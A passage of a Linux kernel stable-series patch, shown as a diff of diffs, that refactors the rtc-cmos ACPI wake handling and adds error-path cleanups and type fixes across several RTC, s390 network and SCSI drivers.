+-		if (info->rtc_day_alarm && info->rtc_day_alarm < 128)
+-			cmos_rtc.day_alrm = info->rtc_day_alarm;
+-		if (info->rtc_mon_alarm && info->rtc_mon_alarm < 128)
+-			cmos_rtc.mon_alrm = info->rtc_mon_alarm;
+-		if (info->rtc_century && info->rtc_century < 128)
+-			cmos_rtc.century = info->rtc_century;
++		cmos_rtc.day_alrm = info->rtc_day_alarm;
++		cmos_rtc.mon_alrm = info->rtc_mon_alarm;
++		cmos_rtc.century = info->rtc_century;
+ 
+ 		if (info->wake_on && info->wake_off) {
+ 			cmos_rtc.wake_on = info->wake_on;
+ 			cmos_rtc.wake_off = info->wake_off;
+ 		}
++	} else {
++		acpi_cmos_wake_setup(dev);
+ 	}
+ 
++	if (cmos_rtc.day_alrm >= 128)
++		cmos_rtc.day_alrm = 0;
++
++	if (cmos_rtc.mon_alrm >= 128)
++		cmos_rtc.mon_alrm = 0;
++
++	if (cmos_rtc.century >= 128)
++		cmos_rtc.century = 0;
++
+ 	cmos_rtc.dev = dev;
+ 	dev_set_drvdata(dev, &cmos_rtc);
+ 
+@@ -928,6 +1098,13 @@ cmos_do_probe(struct device *dev, struct resource *ports, int rtc_irq)
+ 	nvmem_cfg.size = address_space - NVRAM_OFFSET;
+ 	devm_rtc_nvmem_register(cmos_rtc.rtc, &nvmem_cfg);
+ 
++	/*
++	 * Everything has gone well so far, so by default register a handler for
++	 * the ACPI RTC fixed event.
++	 */
++	if (!info)
++		acpi_rtc_event_setup(dev);
++
+ 	dev_info(dev, "%s%s, %d bytes nvram%s\n",
+ 		 !is_valid_irq(rtc_irq) ? "no alarms" :
+ 		 cmos_rtc.mon_alrm ? "alarms up to one year" :
+@@ -973,6 +1150,9 @@ static void cmos_do_remove(struct device *dev)
+ 			hpet_unregister_irq_handler(cmos_interrupt);
+ 	}
+ 
++	if (!dev_get_platdata(dev))
++		acpi_rtc_event_cleanup();
++
+ 	cmos->rtc = NULL;
+ 
+ 	ports = cmos->iomem;
+@@ -1122,9 +1302,6 @@ static void cmos_check_wkalrm(struct device *dev)
+ 	}
+ }
+ 
+-static void cmos_check_acpi_rtc_status(struct device *dev,
+-				       unsigned char *rtc_control);
+-
+ static int __maybe_unused cmos_resume(struct device *dev)
+ {
+ 	struct cmos_rtc	*cmos = dev_get_drvdata(dev);
+@@ -1191,175 +1368,13 @@ static SIMPLE_DEV_PM_OPS(cmos_pm_ops, cmos_suspend, cmos_resume);
+  * predate even PNPBIOS should set up platform_bus devices.
+  */
+ 
+-#ifdef	CONFIG_ACPI
+-
+-#include <linux/acpi.h>
+-
+-static u32 rtc_handler(void *context)
+-{
+-	struct device *dev = context;
+-	struct cmos_rtc *cmos = dev_get_drvdata(dev);
+-	unsigned char rtc_control = 0;
+-	unsigned char rtc_intr;
+-	unsigned long flags;
+-
+-
+-	/*
+-	 * Always update rtc irq when ACPI is used as RTC Alarm.
+-	 * Or else, ACPI SCI is enabled during suspend/resume only,
+-	 * update rtc irq in that case.
+-	 */
+-	if (cmos_use_acpi_alarm())
+-		cmos_interrupt(0, (void *)cmos->rtc);
+-	else {
+-		/* Fix me: can we use cmos_interrupt() here as well? */
+-		spin_lock_irqsave(&rtc_lock, flags);
+-		if (cmos_rtc.suspend_ctrl)
+-			rtc_control = CMOS_READ(RTC_CONTROL);
+-		if (rtc_control & RTC_AIE) {
+-			cmos_rtc.suspend_ctrl &= ~RTC_AIE;
+-			CMOS_WRITE(rtc_control, RTC_CONTROL);
+-			rtc_intr = CMOS_READ(RTC_INTR_FLAGS);
+-			rtc_update_irq(cmos->rtc, 1, rtc_intr);
+-		}
+-		spin_unlock_irqrestore(&rtc_lock, flags);
+-	}
+-
+-	pm_wakeup_hard_event(dev);
+-	acpi_clear_event(ACPI_EVENT_RTC);
+-	acpi_disable_event(ACPI_EVENT_RTC, 0);
+-	return ACPI_INTERRUPT_HANDLED;
+-}
+-
+-static inline void rtc_wake_setup(struct device *dev)
+-{
+-	if (acpi_disabled)
+-		return;
+-
+-	acpi_install_fixed_event_handler(ACPI_EVENT_RTC, rtc_handler, dev);
+-	/*
+-	 * After the RTC handler is installed, the Fixed_RTC event should
+-	 * be disabled. Only when the RTC alarm is set will it be enabled.
+-	 */
+-	acpi_clear_event(ACPI_EVENT_RTC);
+-	acpi_disable_event(ACPI_EVENT_RTC, 0);
+-}
+-
+-static void rtc_wake_on(struct device *dev)
+-{
+-	acpi_clear_event(ACPI_EVENT_RTC);
+-	acpi_enable_event(ACPI_EVENT_RTC, 0);
+-}
+-
+-static void rtc_wake_off(struct device *dev)
+-{
+-	acpi_disable_event(ACPI_EVENT_RTC, 0);
+-}
+-
+-#ifdef CONFIG_X86
+-/* Enable use_acpi_alarm mode for Intel platforms no earlier than 2015 */
+-static void use_acpi_alarm_quirks(void)
+-{
+-	if (boot_cpu_data.x86_vendor != X86_VENDOR_INTEL)
+-		return;
+-
+-	if (!is_hpet_enabled())
+-		return;
+-
+-	if (dmi_get_bios_year() < 2015)
+-		return;
+-
+-	use_acpi_alarm = true;
+-}
+-#else
+-static inline void use_acpi_alarm_quirks(void) { }
+-#endif
+-
+-/* Every ACPI platform has a mc146818 compatible "cmos rtc".  Here we find
+- * its device node and pass extra config data.  This helps its driver use
+- * capabilities that the now-obsolete mc146818 didn't have, and informs it
+- * that this board's RTC is wakeup-capable (per ACPI spec).
+- */
+-static struct cmos_rtc_board_info acpi_rtc_info;
+-
+-static void cmos_wake_setup(struct device *dev)
+-{
+-	if (acpi_disabled)
+-		return;
+-
+-	use_acpi_alarm_quirks();
+-
+-	acpi_rtc_info.wake_on = rtc_wake_on;
+-	acpi_rtc_info.wake_off = rtc_wake_off;
+-
+-	/* workaround bug in some ACPI tables */
+-	if (acpi_gbl_FADT.month_alarm && !acpi_gbl_FADT.day_alarm) {
+-		dev_dbg(dev, "bogus FADT month_alarm (%d)\n",
+-			acpi_gbl_FADT.month_alarm);
+-		acpi_gbl_FADT.month_alarm = 0;
+-	}
+-
+-	acpi_rtc_info.rtc_day_alarm = acpi_gbl_FADT.day_alarm;
+-	acpi_rtc_info.rtc_mon_alarm = acpi_gbl_FADT.month_alarm;
+-	acpi_rtc_info.rtc_century = acpi_gbl_FADT.century;
+-
+-	/* NOTE:  S4_RTC_WAKE is NOT currently useful to Linux */
+-	if (acpi_gbl_FADT.flags & ACPI_FADT_S4_RTC_WAKE)
+-		dev_info(dev, "RTC can wake from S4\n");
+-
+-	dev->platform_data = &acpi_rtc_info;
+-
+-	/* RTC always wakes from S1/S2/S3, and often S4/STD */
+-	device_init_wakeup(dev, 1);
+-}
+-
+-static void cmos_check_acpi_rtc_status(struct device *dev,
+-				       unsigned char *rtc_control)
+-{
+-	struct cmos_rtc *cmos = dev_get_drvdata(dev);
+-	acpi_event_status rtc_status;
+-	acpi_status status;
+-
+-	if (acpi_gbl_FADT.flags & ACPI_FADT_FIXED_RTC)
+-		return;
+-
+-	status = acpi_get_event_status(ACPI_EVENT_RTC, &rtc_status);
+-	if (ACPI_FAILURE(status)) {
+-		dev_err(dev, "Could not get RTC status\n");
+-	} else if (rtc_status & ACPI_EVENT_FLAG_SET) {
+-		unsigned char mask;
+-		*rtc_control &= ~RTC_AIE;
+-		CMOS_WRITE(*rtc_control, RTC_CONTROL);
+-		mask = CMOS_READ(RTC_INTR_FLAGS);
+-		rtc_update_irq(cmos->rtc, 1, mask);
+-	}
+-}
+-
+-#else
+-
+-static void cmos_wake_setup(struct device *dev)
+-{
+-}
+-
+-static void cmos_check_acpi_rtc_status(struct device *dev,
+-				       unsigned char *rtc_control)
+-{
+-}
+-
+-static void rtc_wake_setup(struct device *dev)
+-{
+-}
+-#endif
+-
+ #ifdef	CONFIG_PNP
+ 
+ #include <linux/pnp.h>
+ 
+ static int cmos_pnp_probe(struct pnp_dev *pnp, const struct pnp_device_id *id)
+ {
+-	int irq, ret;
+-
+-	cmos_wake_setup(&pnp->dev);
++	int irq;
+ 
+ 	if (pnp_port_start(pnp, 0) == 0x70 && !pnp_irq_valid(pnp, 0)) {
+ 		irq = 0;
+@@ -1375,13 +1390,7 @@ static int cmos_pnp_probe(struct pnp_dev *pnp, const struct pnp_device_id *id)
+ 		irq = pnp_irq(pnp, 0);
+ 	}
+ 
+-	ret = cmos_do_probe(&pnp->dev, pnp_get_resource(pnp, IORESOURCE_IO, 0), irq);
+-	if (ret)
+-		return ret;
+-
+-	rtc_wake_setup(&pnp->dev);
+-
+-	return 0;
++	return cmos_do_probe(&pnp->dev, pnp_get_resource(pnp, IORESOURCE_IO, 0), irq);
+ }
+ 
+ static void cmos_pnp_remove(struct pnp_dev *pnp)
+@@ -1465,10 +1474,9 @@ static inline void cmos_of_init(struct platform_device *pdev) {}
+ static int __init cmos_platform_probe(struct platform_device *pdev)
+ {
+ 	struct resource *resource;
+-	int irq, ret;
++	int irq;
+ 
+ 	cmos_of_init(pdev);
+-	cmos_wake_setup(&pdev->dev);
+ 
+ 	if (RTC_IOMAPPED)
+ 		resource = platform_get_resource(pdev, IORESOURCE_IO, 0);
+@@ -1478,13 +1486,7 @@ static int __init cmos_platform_probe(struct platform_device *pdev)
+ 	if (irq < 0)
+ 		irq = -1;
+ 
+-	ret = cmos_do_probe(&pdev->dev, resource, irq);
+-	if (ret)
+-		return ret;
+-
+-	rtc_wake_setup(&pdev->dev);
+-
+-	return 0;
++	return cmos_do_probe(&pdev->dev, resource, irq);
+ }
+ 
+ static int cmos_platform_remove(struct platform_device *pdev)
+diff --git a/drivers/rtc/rtc-mxc_v2.c b/drivers/rtc/rtc-mxc_v2.c
+index 5e03834016294..f6d2ad91ff7a9 100644
+--- a/drivers/rtc/rtc-mxc_v2.c
++++ b/drivers/rtc/rtc-mxc_v2.c
+@@ -336,8 +336,10 @@ static int mxc_rtc_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	pdata->rtc = devm_rtc_allocate_device(&pdev->dev);
+-	if (IS_ERR(pdata->rtc))
++	if (IS_ERR(pdata->rtc)) {
++		clk_disable_unprepare(pdata->clk);
+ 		return PTR_ERR(pdata->rtc);
++	}
+ 
+ 	pdata->rtc->ops = &mxc_rtc_ops;
+ 	pdata->rtc->range_max = U32_MAX;
+diff --git a/drivers/rtc/rtc-pcf2127.c b/drivers/rtc/rtc-pcf2127.c
+index 63b275b014bd6..87f4fc9df68b4 100644
+--- a/drivers/rtc/rtc-pcf2127.c
++++ b/drivers/rtc/rtc-pcf2127.c
+@@ -885,9 +885,17 @@ static const struct regmap_bus pcf2127_i2c_regmap = {
+ 
+ static struct i2c_driver pcf2127_i2c_driver;
+ 
+-static int pcf2127_i2c_probe(struct i2c_client *client,
+-				const struct i2c_device_id *id)
++static const struct i2c_device_id pcf2127_i2c_id[] = {
++	{ "pcf2127", 1 },
++	{ "pcf2129", 0 },
++	{ "pca2129", 0 },
++	{ }
++};
++MODULE_DEVICE_TABLE(i2c, pcf2127_i2c_id);
++
++static int pcf2127_i2c_probe(struct i2c_client *client)
+ {
++	const struct i2c_device_id *id = i2c_match_id(pcf2127_i2c_id, client);
+ 	struct regmap *regmap;
+ 	static const struct regmap_config config = {
+ 		.reg_bits = 8,
+@@ -910,20 +918,12 @@ static int pcf2127_i2c_probe(struct i2c_client *client,
+ 			     pcf2127_i2c_driver.driver.name, id->driver_data);
+ }
+ 
+-static const struct i2c_device_id pcf2127_i2c_id[] = {
+-	{ "pcf2127", 1 },
+-	{ "pcf2129", 0 },
+-	{ "pca2129", 0 },
+-	{ }
+-};
+-MODULE_DEVICE_TABLE(i2c, pcf2127_i2c_id);
+-
+ static struct i2c_driver pcf2127_i2c_driver = {
+ 	.driver		= {
+ 		.name	= "rtc-pcf2127-i2c",
+ 		.of_match_table = of_match_ptr(pcf2127_of_match),
+ 	},
+-	.probe		= pcf2127_i2c_probe,
++	.probe_new	= pcf2127_i2c_probe,
+ 	.id_table	= pcf2127_i2c_id,
+ };
+ 
+diff --git a/drivers/rtc/rtc-pcf85063.c b/drivers/rtc/rtc-pcf85063.c
+index 095891999da11..754e03984f986 100644
+--- a/drivers/rtc/rtc-pcf85063.c
++++ b/drivers/rtc/rtc-pcf85063.c
+@@ -169,10 +169,10 @@ static int pcf85063_rtc_read_alarm(struct device *dev, struct rtc_wkalrm *alrm)
+ 	if (ret)
+ 		return ret;
+ 
+-	alrm->time.tm_sec = bcd2bin(buf[0]);
+-	alrm->time.tm_min = bcd2bin(buf[1]);
+-	alrm->time.tm_hour = bcd2bin(buf[2]);
+-	alrm->time.tm_mday = bcd2bin(buf[3]);
++	alrm->time.tm_sec = bcd2bin(buf[0] & 0x7f);
++	alrm->time.tm_min = bcd2bin(buf[1] & 0x7f);
++	alrm->time.tm_hour = bcd2bin(buf[2] & 0x3f);
++	alrm->time.tm_mday = bcd2bin(buf[3] & 0x3f);
+ 
+ 	ret = regmap_read(pcf85063->regmap, PCF85063_REG_CTRL2, &val);
+ 	if (ret)
+@@ -424,7 +424,7 @@ static int pcf85063_clkout_control(struct clk_hw *hw, bool enable)
+ 	unsigned int buf;
+ 	int ret;
+ 
+-	ret = regmap_read(pcf85063->regmap, PCF85063_REG_OFFSET, &buf);
++	ret = regmap_read(pcf85063->regmap, PCF85063_REG_CTRL2, &buf);
+ 	if (ret < 0)
+ 		return ret;
+ 	buf &= PCF85063_REG_CLKO_F_MASK;
+diff --git a/drivers/rtc/rtc-pic32.c b/drivers/rtc/rtc-pic32.c
+index 7fb9145c43bd5..fa351ac201587 100644
+--- a/drivers/rtc/rtc-pic32.c
++++ b/drivers/rtc/rtc-pic32.c
+@@ -324,16 +324,16 @@ static int pic32_rtc_probe(struct platform_device *pdev)
+ 
+ 	spin_lock_init(&pdata->alarm_lock);
+ 
++	pdata->rtc = devm_rtc_allocate_device(&pdev->dev);
++	if (IS_ERR(pdata->rtc))
++		return PTR_ERR(pdata->rtc);
++
+ 	clk_prepare_enable(pdata->clk);
+ 
+ 	pic32_rtc_enable(pdata, 1);
+ 
+ 	device_init_wakeup(&pdev->dev, 1);
+ 
+-	pdata->rtc = devm_rtc_allocate_device(&pdev->dev);
+-	if (IS_ERR(pdata->rtc))
+-		return PTR_ERR(pdata->rtc);
+-
+ 	pdata->rtc->ops = &pic32_rtcops;
+ 	pdata->rtc->range_min = RTC_TIMESTAMP_BEGIN_2000;
+ 	pdata->rtc->range_max = RTC_TIMESTAMP_END_2099;
+diff --git a/drivers/rtc/rtc-rzn1.c b/drivers/rtc/rtc-rzn1.c
+index ac788799c8e3e..0d36bc50197c1 100644
+--- a/drivers/rtc/rtc-rzn1.c
++++ b/drivers/rtc/rtc-rzn1.c
+@@ -355,7 +355,9 @@ static int rzn1_rtc_probe(struct platform_device *pdev)
+ 	set_bit(RTC_FEATURE_ALARM_RES_MINUTE, rtc->rtcdev->features);
+ 	clear_bit(RTC_FEATURE_UPDATE_INTERRUPT, rtc->rtcdev->features);
+ 
+-	devm_pm_runtime_enable(&pdev->dev);
++	ret = devm_pm_runtime_enable(&pdev->dev);
++	if (ret < 0)
++		return ret;
+ 	ret = pm_runtime_resume_and_get(&pdev->dev);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/rtc/rtc-snvs.c b/drivers/rtc/rtc-snvs.c
+index bd929b0e7d7de..d82acf1af1fae 100644
+--- a/drivers/rtc/rtc-snvs.c
++++ b/drivers/rtc/rtc-snvs.c
+@@ -32,6 +32,14 @@
+ #define SNVS_LPPGDR_INIT	0x41736166
+ #define CNTR_TO_SECS_SH		15
+ 
++/* The maximum RTC clock cycles that are allowed to pass between two
++ * consecutive clock counter register reads. If the values are corrupted a
++ * bigger difference is expected. The RTC frequency is 32kHz. With 320 cycles
++ * we end at 10ms which should be enough for most cases. If it once takes
++ * longer than expected we do a retry.
++ */
++#define MAX_RTC_READ_DIFF_CYCLES	320
++
+ struct snvs_rtc_data {
+ 	struct rtc_device *rtc;
+ 	struct regmap *regmap;
+@@ -56,6 +64,7 @@ static u64 rtc_read_lpsrt(struct snvs_rtc_data *data)
+ static u32 rtc_read_lp_counter(struct snvs_rtc_data *data)
+ {
+ 	u64 read1, read2;
++	s64 diff;
+ 	unsigned int timeout = 100;
+ 
+ 	/* As expected, the registers might update between the read of the LSB
+@@ -66,7 +75,8 @@ static u32 rtc_read_lp_counter(struct snvs_rtc_data *data)
+ 	do {
+ 		read2 = read1;
+ 		read1 = rtc_read_lpsrt(data);
+-	} while (read1 != read2 && --timeout);
++		diff = read1 - read2;
++	} while (((diff < 0) || (diff > MAX_RTC_READ_DIFF_CYCLES)) && --timeout);
+ 	if (!timeout)
+ 		dev_err(&data->rtc->dev, "Timeout trying to get valid LPSRT Counter read\n");
+ 
+@@ -78,13 +88,15 @@ static u32 rtc_read_lp_counter(struct snvs_rtc_data *data)
+ static int rtc_read_lp_counter_lsb(struct snvs_rtc_data *data, u32 *lsb)
+ {
+ 	u32 count1, count2;
++	s32 diff;
+ 	unsigned int timeout = 100;
+ 
+ 	regmap_read(data->regmap, data->offset + SNVS_LPSRTCLR, &count1);
+ 	do {
+ 		count2 = count1;
+ 		regmap_read(data->regmap, data->offset + SNVS_LPSRTCLR, &count1);
+-	} while (count1 != count2 && --timeout);
++		diff = count1 - count2;
++	} while (((diff < 0) || (diff > MAX_RTC_READ_DIFF_CYCLES)) && --timeout);
+ 	if (!timeout) {
+ 		dev_err(&data->rtc->dev, "Timeout trying to get valid LPSRT Counter read\n");
+ 		return -ETIMEDOUT;
+diff --git a/drivers/rtc/rtc-st-lpc.c b/drivers/rtc/rtc-st-lpc.c
+index bdb20f63254e2..0f8e4231098ef 100644
+--- a/drivers/rtc/rtc-st-lpc.c
++++ b/drivers/rtc/rtc-st-lpc.c
+@@ -238,6 +238,7 @@ static int st_rtc_probe(struct platform_device *pdev)
+ 
+ 	rtc->clkrate = clk_get_rate(rtc->clk);
+ 	if (!rtc->clkrate) {
++		clk_disable_unprepare(rtc->clk);
+ 		dev_err(&pdev->dev, "Unable to fetch clock rate\n");
+ 		return -EINVAL;
+ 	}
+diff --git a/drivers/s390/net/ctcm_main.c b/drivers/s390/net/ctcm_main.c
+index 37b551bd43bff..bdfab9ea00464 100644
+--- a/drivers/s390/net/ctcm_main.c
++++ b/drivers/s390/net/ctcm_main.c
+@@ -825,16 +825,9 @@ done:
+ /*
+  * Start transmission of a packet.
+  * Called from generic network device layer.
+- *
+- *  skb		Pointer to buffer containing the packet.
+- *  dev		Pointer to interface struct.
+- *
+- * returns 0 if packet consumed, !0 if packet rejected.
+- *         Note: If we return !0, then the packet is free'd by
+- *               the generic network layer.
+  */
+ /* first merge version - leaving both functions separated */
+-static int ctcm_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t ctcm_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct ctcm_priv *priv = dev->ml_priv;
+ 
+@@ -877,7 +870,7 @@ static int ctcm_tx(struct sk_buff *skb, struct net_device *dev)
+ }
+ 
+ /* unmerged MPC variant of ctcm_tx */
+-static int ctcmpc_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t ctcmpc_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	int len = 0;
+ 	struct ctcm_priv *priv = dev->ml_priv;
+diff --git a/drivers/s390/net/lcs.c b/drivers/s390/net/lcs.c
+index 84c8981317b46..38f312664ce72 100644
+--- a/drivers/s390/net/lcs.c
++++ b/drivers/s390/net/lcs.c
+@@ -1519,9 +1519,8 @@ lcs_txbuffer_cb(struct lcs_channel *channel, struct lcs_buffer *buffer)
+ /*
+  * Packet transmit function called by network stack
+  */
+-static int
+-__lcs_start_xmit(struct lcs_card *card, struct sk_buff *skb,
+-		 struct net_device *dev)
++static netdev_tx_t __lcs_start_xmit(struct lcs_card *card, struct sk_buff *skb,
++				    struct net_device *dev)
+ {
+ 	struct lcs_header *header;
+ 	int rc = NETDEV_TX_OK;
+@@ -1582,8 +1581,7 @@ out:
+ 	return rc;
+ }
+ 
+-static int
+-lcs_start_xmit(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t lcs_start_xmit(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct lcs_card *card;
+ 	int rc;
+diff --git a/drivers/s390/net/netiucv.c b/drivers/s390/net/netiucv.c
+index 65aa0a96c21de..66076cada8ae4 100644
+--- a/drivers/s390/net/netiucv.c
++++ b/drivers/s390/net/netiucv.c
+@@ -1248,15 +1248,8 @@ static int netiucv_close(struct net_device *dev)
+ /*
+  * Start transmission of a packet.
+  * Called from generic network device layer.
+- *
+- * @param skb Pointer to buffer containing the packet.
+- * @param dev Pointer to interface struct.
+- *
+- * @return 0 if packet consumed, !0 if packet rejected.
+- *         Note: If we return !0, then the packet is free'd by
+- *               the generic network layer.
+  */
+-static int netiucv_tx(struct sk_buff *skb, struct net_device *dev)
++static netdev_tx_t netiucv_tx(struct sk_buff *skb, struct net_device *dev)
+ {
+ 	struct netiucv_priv *privptr = netdev_priv(dev);
+ 	int rc;
+diff --git a/drivers/scsi/elx/efct/efct_driver.c b/drivers/scsi/elx/efct/efct_driver.c
+index b08fc8839808d..49fd2cfed70c7 100644
+--- a/drivers/scsi/elx/efct/efct_driver.c
++++ b/drivers/scsi/elx/efct/efct_driver.c
+@@ -42,6 +42,7 @@ efct_device_init(void)
+ 
+ 	rc = efct_scsi_reg_fc_transport();
+ 	if (rc) {
++		efct_scsi_tgt_driver_exit();
+ 		pr_err("failed to register to FC host\n");
+ 		return rc;
+ 	}
+diff --git a/drivers/scsi/elx/libefc/efclib.h b/drivers/scsi/elx/libefc/efclib.h
+index dde20891c2dd7..57e3386128127 100644
+--- a/drivers/scsi/elx/libefc/efclib.h
++++ b/drivers/scsi/elx/libefc/efclib.h
+@@ -58,10 +58,12 @@ enum efc_node_send_ls_acc {
+ #define EFC_LINK_STATUS_UP		0
+ #define EFC_LINK_STATUS_DOWN		1
+ 
++enum efc_sm_event;
++
+ /* State machine context header  */
+ struct efc_sm_ctx {
+ 	void (*current_state)(struct efc_sm_ctx *ctx,
+-			      u32 evt, void *arg);
++			      enum efc_sm_event evt, void *arg);
+ 
+ 	const char	*description;
+ 	void		*app;
+@@ -365,7 +367,7 @@ struct efc_node {
+ 	int			prev_evt;
+ 
+ 	void (*nodedb_state)(struct efc_sm_ctx *ctx,
+-			     u32 evt, void *arg);
++			     enum efc_sm_event evt, void *arg);
+ 	struct timer_list	gidpt_delay_timer;
+ 	u64			time_last_gidpt_msec;
+ 
+diff --git a/drivers/scsi/fcoe/fcoe.c b/drivers/scsi/fcoe/fcoe.c
+index 6ec296321ffc1..38774a272e627 100644
+--- a/drivers/scsi/fcoe/fcoe.c
++++ b/drivers/scsi/fcoe/fcoe.c
+@@ -2491,6 +2491,7 @@ static int __init fcoe_init(void)
+ 
+ out_free:
+ 	mutex_unlock(&fcoe_config_mutex);
++	fcoe_transport_detach(&fcoe_sw_transport);
+ out_destroy:
+ 	destroy_workqueue(fcoe_wq);
+ 	return rc;
+diff --git a/drivers/scsi/fcoe/fcoe_sysfs.c b/drivers/scsi/fcoe/fcoe_sysfs.c
+index af658aa38fedf..6260aa5ea6af8 100644
+--- a/drivers/scsi/fcoe/fcoe_sysfs.c
++++ b/drivers/scsi/fcoe/fcoe_sysfs.c
+@@ -830,14 +830,15 @@ struct fcoe_ctlr_device *fcoe_ctlr_device_add(struct device *parent,
+ 
+ 	dev_set_name(&ctlr->dev, "ctlr_%d", ctlr->id);
+ 	error = device_register(&ctlr->dev);
+-	if (error)
+-		goto out_del_q2;
++	if (error) {
++		destroy_workqueue(ctlr->devloss_work_q);
++		destroy_workqueue(ctlr->work_q);
++		put_device(&ctlr->dev);
++		return NULL;
++	}
+ 
+ 	return ctlr;
+ 
+-out_del_q2:
+-	destroy_workqueue(ctlr->devloss_work_q);
+-	ctlr->devloss_work_q = NULL;
+ out_del_q:
+ 	destroy_workqueue(ctlr->work_q);
+ 	ctlr->work_q = NULL;
+@@ -1036,16 +1037,16 @@ struct fcoe_fcf_device *fcoe_fcf_device_add(struct fcoe_ctlr_device *ctlr,
+ 	fcf->selected = new_fcf->selected;
+ 
+ 	error = device_register(&fcf->dev);
+-	if (error)
+-		goto out_del;
++	if (error) {
++		put_device(&fcf->dev);
++		goto out;
++	}
+ 
+ 	fcf->state = FCOE_FCF_STATE_CONNECTED;
+ 	list_add_tail(&fcf->peers, &ctlr->fcfs);
+ 
+ 	return fcf;
+ 
+-out_del:
+-	kfree(fcf);
+ out:
+ 	return NULL;
+ }
+diff --git a/drivers/scsi/hpsa.c b/drivers/scsi/hpsa.c
+index f8e832b1bc46a..4dbf51e2623ad 100644
+--- a/drivers/scsi/hpsa.c
++++ b/drivers/scsi/hpsa.c
+@@ -8925,7 +8925,7 @@ clean1:	/* wq/aer/h */
+ 		destroy_workqueue(h->monitor_ctlr_wq);
+ 		h->monitor_ctlr_wq = NULL;
+ 	}
+-	kfree(h);
++	hpda_free_ctlr_info(h);
+ 	return rc;
+ }
+ 
+@@ -9786,7 +9786,8 @@ static int hpsa_add_sas_host(struct ctlr_info *h)
+ 	return 0;
+ 
+ free_sas_phy:
+-	hpsa_free_sas_phy(hpsa_sas_phy);
++	sas_phy_free(hpsa_sas_phy->phy);
++	kfree(hpsa_sas_phy);
+ free_sas_port:
+ 	hpsa_free_sas_port(hpsa_sas_port);
+ free_sas_node:
+@@ -9822,10 +9823,12 @@ static int hpsa_add_sas_device(struct hpsa_sas_node *hpsa_sas_node,
+ 
+ 	rc = hpsa_sas_port_add_rphy(hpsa_sas_port, rphy);
+ 	if (rc)
+-		goto free_sas_port;
++		goto free_sas_rphy;
+ 
+ 	return 0;
+ 
++free_sas_rphy:
++	sas_rphy_free(rphy);
+ free_sas_port:
+ 	hpsa_free_sas_port(hpsa_sas_port);
+ 	device->sas_port = NULL;
+diff --git a/drivers/scsi/ipr.c b/drivers/scsi/ipr.c
+index 9d01a3e3c26aa..2022ffb450417 100644
+--- a/drivers/scsi/ipr.c
++++ b/drivers/scsi/ipr.c
+@@ -10872,11 +10872,19 @@ static struct notifier_block ipr_notifier = {
+  **/
+ static int __init ipr_init(void)
+ {
++	int rc;
++
+ 	ipr_info("IBM Power RAID SCSI Device Driver version: %s %s\n",
+ 		 IPR_DRIVER_VERSION, IPR_DRIVER_DATE);
+ 
+ 	register_reboot_notifier(&ipr_notifier);
+-	return pci_register_driver(&ipr_driver);
++	rc = pci_register_driver(&ipr_driver);
++	if (rc) {
++		unregister_reboot_notifier(&ipr_notifier);
++		return rc;
++	}
++
++	return 0;
+ }
+ 
+ /**
+diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
+index 99d06dc7ddf6b..21c52154626f1 100644
+--- a/drivers/scsi/lpfc/lpfc_sli.c
++++ b/drivers/scsi/lpfc/lpfc_sli.c
+@@ -8150,10 +8150,10 @@ u32 lpfc_rx_monitor_report(struct lpfc_hba *phba,
+ 					"IO_cnt", "Info", "BWutil(ms)");
+ 	}
+ 
+-	/* Needs to be _bh because record is called from timer interrupt
++	/* Needs to be _irq because record is called from timer interrupt
+ 	 * context
+ 	 */
+-	spin_lock_bh(ring_lock);
++	spin_lock_irq(ring_lock);
+ 	while (*head_idx != *tail_idx) {
+ 		entry = &ring[*head_idx];
+ 
+@@ -8197,7 +8197,7 @@ u32 lpfc_rx_monitor_report(struct lpfc_hba *phba,
+ 		if (cnt >= max_read_entries)
+ 			break;
+ 	}
+-	spin_unlock_bh(ring_lock);
++	spin_unlock_irq(ring_lock);
+ 
+ 	return cnt;
+ }
+diff --git a/drivers/scsi/mpt3sas/mpt3sas_transport.c b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+index 0681daee6c149..e5ecd6ada6cdd 100644
+--- a/drivers/scsi/mpt3sas/mpt3sas_transport.c
++++ b/drivers/scsi/mpt3sas/mpt3sas_transport.c
+@@ -829,6 +829,8 @@ mpt3sas_transport_port_add(struct MPT3SAS_ADAPTER *ioc, u16 handle,
+ 	if ((sas_rphy_add(rphy))) {
+ 		ioc_err(ioc, "failure at %s:%d/%s()!\n",
+ 			__FILE__, __LINE__, __func__);
++		sas_rphy_free(rphy);
++		rphy = NULL;
+ 	}
+ 
+ 	if (mpt3sas_port->remote_identify.device_type == SAS_END_DEVICE) {
+diff --git a/drivers/scsi/qla2xxx/qla_def.h b/drivers/scsi/qla2xxx/qla_def.h
+index 802eec6407d9a..a26a373be9da3 100644
+--- a/drivers/scsi/qla2xxx/qla_def.h
++++ b/drivers/scsi/qla2xxx/qla_def.h
+@@ -5136,17 +5136,17 @@ struct secure_flash_update_block_pk {
+ 		(test_bit(ISP_ABORT_NEEDED, &ha->dpc_flags) || \
+ 			 test_bit(LOOP_RESYNC_NEEDED, &ha->dpc_flags))
+ 
+-#define QLA_VHA_MARK_BUSY(__vha, __bail) do {		\
+-	atomic_inc(&__vha->vref_count);			\
+-	mb();						\
+-	if (__vha->flags.delete_progress) {		\
+-		atomic_dec(&__vha->vref_count);		\
+-		wake_up(&__vha->vref_waitq);		\
+-		__bail = 1;				\
+-	} else {					\
+-		__bail = 0;				\
+-	}						\
+-} while (0)
++static inline bool qla_vha_mark_busy(scsi_qla_host_t *vha)
++{
++	atomic_inc(&vha->vref_count);
++	mb();
++	if (vha->flags.delete_progress) {
++		atomic_dec(&vha->vref_count);
++		wake_up(&vha->vref_waitq);
++		return true;
++	}
++	return false;
++}
+ 
+ #define QLA_VHA_MARK_NOT_BUSY(__vha) do {		\
+ 	atomic_dec(&__vha->vref_count);			\
+diff --git a/drivers/scsi/qla2xxx/qla_init.c b/drivers/scsi/qla2xxx/qla_init.c
+index e12db95de6883..432f47fc5e1f3 100644
+--- a/drivers/scsi/qla2xxx/qla_init.c
